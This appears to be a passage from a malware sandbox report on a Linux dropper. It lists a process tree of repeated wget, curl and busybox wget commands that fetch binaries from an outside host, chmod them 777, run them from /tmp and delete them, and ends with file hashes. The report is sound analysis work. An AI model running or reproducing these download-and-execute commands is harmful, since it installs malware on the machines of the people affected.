/bin/chmodchmod 777 QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI./QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵PID:946
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵
- System Network Configuration Discovery
PID:947
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵PID:950
-
-
/bin/chmodchmod 777 u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx./u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵PID:953
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵
- System Network Configuration Discovery
PID:954
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵
- System Network Configuration Discovery
PID:957
-
-
/bin/chmodchmod 777 8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet./8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm 8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵PID:960
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵PID:961
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵PID:964
-
-
/bin/chmodchmod 777 9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq0./9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm 9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵PID:967
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵
- System Network Configuration Discovery
PID:968
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵
- System Network Configuration Discovery
PID:971
-
-
/bin/chmodchmod 777 0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵
- File and Directory Permissions Modification
PID:972
-
-
/tmp/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX./0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵
- Executes dropped EXE
PID:973
-
-
/bin/rmrm 0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵PID:974
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵PID:975
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵
- Reads runtime system information
- Writes file to tmp directory
PID:976
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵PID:978
-
-
/bin/chmodchmod 777 DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV30./DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵PID:981
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵
- System Network Configuration Discovery
PID:982
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:983
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵
- System Network Configuration Discovery
PID:985
-
-
/bin/chmodchmod 777 G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵
- File and Directory Permissions Modification
PID:986
-
-
/tmp/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh./G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵
- Executes dropped EXE
PID:987
-
-
/bin/rmrm G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵PID:988
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵
- System Network Configuration Discovery
PID:989
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:990
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵
- System Network Configuration Discovery
PID:992
-
-
/bin/chmodchmod 777 S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵
- File and Directory Permissions Modification
PID:993
-
-
/tmp/S82B3midttp7tynH1d7SXU5VngkmPvSAys./S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵
- Executes dropped EXE
PID:994
-
-
/bin/rmrm S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵PID:995
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵PID:996
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:997
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵
- System Network Configuration Discovery
PID:999
-
-
/bin/chmodchmod 777 9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵
- File and Directory Permissions Modification
PID:1000
-
-
/tmp/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB./9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵
- Executes dropped EXE
PID:1001
-
-
/bin/rmrm 9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵PID:1002
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵
- System Network Configuration Discovery
PID:1003
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1004
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵
- System Network Configuration Discovery
PID:1006
-
-
/bin/chmodchmod 777 YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵
- File and Directory Permissions Modification
PID:1007
-
-
/tmp/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b5./YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵
- Executes dropped EXE
PID:1008
-
-
/bin/rmrm YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵PID:1009
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97